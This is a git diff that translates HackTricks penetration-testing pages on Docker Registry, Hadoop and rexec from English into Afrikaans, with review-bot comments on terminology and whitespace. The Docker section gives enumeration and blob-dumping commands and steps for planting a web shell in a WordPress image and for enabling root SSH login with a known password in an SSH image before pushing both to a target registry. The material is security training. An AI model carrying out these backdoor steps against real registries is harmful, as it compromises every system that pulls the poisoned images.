Die eerste ding wat jy moet doen, is dus **uitvind watter een** gekonfigureer word: ```bash curl -s http://10.10.10.10:5000/v2/_catalog #If HTTPS -Warning: Binary output can mess up your terminal. Use "--output -" to tell -Warning: curl to output it to your terminal anyway, or consider "--output +Warning: Binary output can mess up your terminal. Use "--output -" to tell +Warning: curl to output it to your terminal anyway, or consider "--output Warning: " to save to a file. #If HTTP {"repositories":["alpine","ubuntu"]} ``` +### Verifikasie -### Authentication - -Docker registry may also be configured to require **authentication**: - +Docker-register kan ook ingestel word om **verifikasie** te vereis: ```bash curl -k https://192.25.197.3:5000/v2/_catalog #If Authentication required 
@@ -78,18 +69,14 @@ curl -k https://192.25.197.3:5000/v2/_catalog #If no authentication required {"repositories":["alpine","ubuntu"]} ``` - -If the Docker Registry is requiring authentication you can[ **try to brute force it using this**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\ -**If you find valid credentials you will need to use them** to enumerate the registry, in `curl` you can use them like this: - +As die Docker Register verifikasie vereis, kan jy probeer om dit te kragtig deur dit te [brute force](../generic-methodologies-and-resources/brute-force.md#docker-registry).\ +**As jy geldige geloofsbriewe vind, sal jy dit moet gebruik** om die register op te som, in `curl` kan jy dit so gebruik: ```bash curl -k -u username:password https://10.10.10.10:5000/v2/_catalog ``` +### Enumerasie met behulp van DockerRegistryGrabber -### Enumeration using DockerRegistryGrabber - -[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) is a python tool to enumerate / dump docker degistry (without or with basic authentication) - +[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) is 'n Python-hulpmiddel om 'n Docker-registreering te enumereer / dump (sonder of met basiese outentifikasie). ```bash python3 DockerGraber.py http://127.0.0.1 --list 
@@ -102,35 +89,33 @@ python3 DockerGraber.py http://127.0.0.1 --dump_all [+] my-ubuntu2 [+] blobSum found 5 [+] Dumping my-ubuntu - [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 - [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 - [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 - [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 - [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 +[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 +[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 +[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 +[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 +[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 [+] blobSum found 5 [+] Dumping my-ubuntu2 - [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 - [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 - [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 - [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 - [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 +[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 +[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 +[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 +[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 +[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 python3 DockerGraber.py http://127.0.0.1 --dump my-ubuntu [+] blobSum found 5 [+] Dumping my-ubuntu - [+] Downloading : 
a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 - [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 - [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 - [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 - [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 +[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 +[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 +[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 +[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 +[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 ``` +### Enumerasie met behulp van curl -### Enumeration using curl - -Once you **obtained access to the docker registry** here are some commands you can use to enumerate it: - +Sodra jy toegang tot die Docker-register verkry het, is hier 'n paar opdragte wat jy kan gebruik om dit te enumereer: ```bash #List repositories curl -s http://10.10.10.10:5000/v2/_catalog 
@@ -143,48 +128,48 @@ curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list #Get manifests curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest { - "schemaVersion": 1, - "name": "ubuntu", - "tag": "latest", - "architecture": "amd64", - "fsLayers": [ - { - "blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935" - }, - { - "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" - }, - { - "blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10" - } - ], - "history": [ - { - "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}" - }, - { - 
"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}" - }, - { - "v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}" - } - ], - "signatures": [ - { - "header": { - "jwk": { - "crv": "P-256", - "kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX", - "kty": "EC", - "x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg", - "y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg" - }, - "alg": "ES256" - }, - "signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q", - "protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ" - } - ] +"schemaVersion": 1, +"name": "ubuntu", +"tag": "latest", +"architecture": "amd64", +"fsLayers": [ +{ +"blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935" +}, +{ +"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" +}, +{ +"blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10" +} +], +"history": [ +{ +"v1Compatibility": 
"{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}" +}, +{ +"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}" +}, +{ +"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / 
\"]}}" +} +], +"signatures": [ +{ +"header": { +"jwk": { +"crv": "P-256", +"kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX", +"kty": "EC", +"x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg", +"y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg" +}, +"alg": "ES256" +}, +"signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q", +"protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ" +} +] } #Download one of the previously listed blobs @@ -193,13 +178,11 @@ curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fa #Inspect the insides of each blob tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory ``` - {% hint style="warning" %} -Note that when you download and decompress the blobs files and folders will appear in the current directory. **If you download all the blobs and decompress them in the same folder they will overwrite values from the previously decompressed blobs**, so be careful. It may be interesting to decompress each blob inside a different folder to inspect the exact content of each blob. +Let daarop dat wanneer jy die blobs lêers aflaai en dekomprimeer, sal lêers en vouers in die huidige gids verskyn. **As jy al die blobs aflaai en hulle in dieselfde vouer dekomprimeer, sal waardes van vorige gedekomprimeerde blobs oorskryf word**, so wees versigtig. Dit mag interessant wees om elke blob binne 'n ander vouer te dekomprimeer om die presiese inhoud van elke blob te ondersoek. {% endhint %} -### Enumeration using docker - +### Enumerasie met behulp van Docker ```bash #Once you know which images the server is saving (/v2/_catalog) you can pull them docker pull 10.10.10.10:5000/ubuntu 
@@ -207,22 +190,21 @@ docker pull 10.10.10.10:5000/ubuntu #Check the commands used to create the layers of the image docker history 10.10.10.10:5000/ubuntu #IMAGE CREATED CREATED BY SIZE COMMENT -#ed05bef01522 2 years ago ./run.sh 46.8MB -# 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B -# 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B -# 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B -# 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB +#ed05bef01522 2 years ago ./run.sh 46.8MB +# 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B +# 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B +# 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B +# 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB #Run and get a shell docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running docker ps #Using a different shell docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container ``` +### Backdooring WordPress-beeld -### Backdooring WordPress image - -In the scenario where you have found a Docker Registry saving a wordpress image you can backdoor it.\ -**Create** the **backdoor**: +In die scenario waar jy 'n Docker Registry gevind het wat 'n WordPress-beeld stoor, kan jy dit agterdeur gee. +**Skep** die **agterdeur**: {% code title="shell.php" %} ```bash @@ -230,7 +212,7 @@ In the scenario where you have found a Docker Registry saving a wordpress image ``` {% endcode %} -Create a **Dockerfile**: +Skep 'n **Dockerfile**: {% code title="Dockerfile" %} ```bash 
@@ -240,34 +222,28 @@ RUN chmod 777 /app/shell.php ``` {% endcode %} -**Create** the new image, **check** it's created, and **push** it: - +**Skep** die nuwe prent, **kontroleer** of dit geskep is, en **stoot** dit: ```bash docker build -t 10.10.10.10:5000/wordpress . - #Create +#Create docker images docker push registry:5000/wordpress #Push it ``` +### Agterdeur SSH-bedienerbeeld -### Backdooring SSH server image - -Suppose that you found a Docker Registry with a SSH image and you want to backdoor it.\ -**Download** the image and **run** it: - +Stel dat jy 'n Docker Registry met 'n SSH-beeld gevind het en jy wil dit agterdeur.\ +**Laai** die beeld af en **voer** dit uit: ```bash docker pull 10.10.10.10:5000/sshd-docker-cli docker run -d 10.10.10.10:5000/sshd-docker-cli ``` - -Extract the `sshd_config` file from the SSH image: - +Haal die `sshd_config` lêer uit die SSH prent: ```bash docker cp 4c989242c714:/etc/ssh/sshd_config . ``` +En wysig dit om `PermitRootLogin yes` in te stel. -And modify it to set: `PermitRootLogin yes` - -Create a **Dockerfile** like the following one: +Skep 'n **Dockerfile** soos die volgende: {% tabs %} {% tab title="Dockerfile" %} @@ -279,28 +255,26 @@ RUN echo root:password | chpasswd {% endtab %} {% endtabs %} -**Create** the new image, **check** it's created, and **push** it: - +**Skep** die nuwe prent, **kontroleer** of dit geskep is, en **stoot** dit: ```bash docker build -t 10.10.10.10:5000/sshd-docker-cli . - #Create +#Create docker images docker push registry:5000/sshd-docker-cli #Push it ``` - -## References +## Verwysings * [https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
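Review bot: The Docker Registry hunks use several different renderings of the product name, which should be unified: the title becomes `# 5000 - Pentesting Docker Register`, the body uses `Docker-register`, the authentication paragraph `Docker Register`, DockerRegistryGrabber is described as dumping `'n Docker-registreering`, and the backdooring section keeps `Docker Registry`. Likewise "image" is `beeld` in most places but `prent` in `**Skep** die nuwe prent` and `uit die SSH prent`. The sentence `kan jy probeer om dit te kragtig deur dit te [brute force](...)` is ungrammatical (`kragtig` is an adjective, not a verb); something like `kan jy probeer om dit met [brute force](...) te kraak` keeps the link and the meaning. The hunks also re-indent quoted tool output and JSON that a translation should not touch: the `Warning: Binary output ...` curl lines, the `[+] Downloading : ...` lines of the DockerRegistryGrabber output, the whole manifest JSON (`-    "schemaVersion": 1,` becomes `+"schemaVersion": 1,`), the `docker history` columns and the `#Create` comment; these whitespace-only changes make the manifest harder to read and should be reverted so the diff contains only the translated prose.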
diff --git a/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md index 2a7cd53ec..7fd707565 100644 --- a/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md +++ b/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md @@ -1,25 +1,23 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
-# **Basic Information** +# **Basiese Inligting** -**Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing. +**Apache Hadoop** is 'n **open-source raamwerk** vir **verspreide stoor en verwerking** van **groot datastelle** oor **rekenaarclusters**. Dit gebruik **HDFS** vir stoor en **MapReduce** vir verwerking. -Unfortunatelly Hadoop lacks support in the Metasploit framework at the time of documentation. However, you can use the following **Nmap scripts** to enumerate Hadoop services: +Ongelukkig het Hadoop nie ondersteuning in die Metasploit-raamwerk ten tye van dokumentasie nie. Jy kan egter die volgende **Nmap-skripte** gebruik om Hadoop-dienste op te som: - **`hadoop-jobtracker-info (Port 50030)`** - **`hadoop-tasktracker-info (Port 50060)`** @@ -28,20 +26,18 @@ Unfortunatelly Hadoop lacks support in the Metasploit framework at the time of d - **`hadoop-secondary-namenode-info (Port 50090)`** -It's crucial to note that **Hadoop operates without authentication in its default setup**. However, for enhanced security, configurations are available to integrate Kerberos with HDFS, YARN, and MapReduce services. +Dit is belangrik om op te merk dat **Hadoop sonder outentifikasie in sy verstekopset werk**. Daar is egter konfigurasies beskikbaar vir verbeterde sekuriteit om Kerberos met HDFS, YARN en MapReduce-dienste te integreer.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
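Review bot: the `+` footer lines at the end of this hunk translate the shared HackTricks banner differently from the same banner in the other files of this patch (`GitHub-opslag` here, `github-repos` in 512-pentesting-rexec.md and 515-pentesting-line-printer-daemon-lpd.md, `github-opslag` elsewhere, and `hacking-truuks`, `hacktruuks`, `hack-truuks` and `haktruuks` for "hacking tricks"). Since this banner is repeated at the top and bottom of every page, translate it once and paste the same text everywhere, otherwise every later sync produces noisy diffs. In the `@@ -28,20 +26,18 @@` hunk, `**Hadoop sonder outentifikasie in sy verstekopset werk**` keeps the emphasis and the security warning of the original, but `outentifikasie` is not the term used for "authentication" in the mDNS and RTSP files of this patch (`verifikasie`); pick one term for the whole translation.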
- - diff --git a/network-services-pentesting/512-pentesting-rexec.md b/network-services-pentesting/512-pentesting-rexec.md index d455a42b8..fefd6c1fd 100644 --- a/network-services-pentesting/512-pentesting-rexec.md +++ b/network-services-pentesting/512-pentesting-rexec.md @@ -2,41 +2,39 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password). - -**Default Port:** 512 +Dit is 'n diens wat jou toelaat om 'n bevel binne 'n gasheer uit te voer as jy geldige **legitimasie** (gebruikersnaam en wagwoord) weet. +**Verstekpoort:** 512 ``` PORT STATE SERVICE 512/tcp open exec ``` - ### [**Brute-force**](../generic-methodologies-and-resources/brute-force.md#rexec)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) 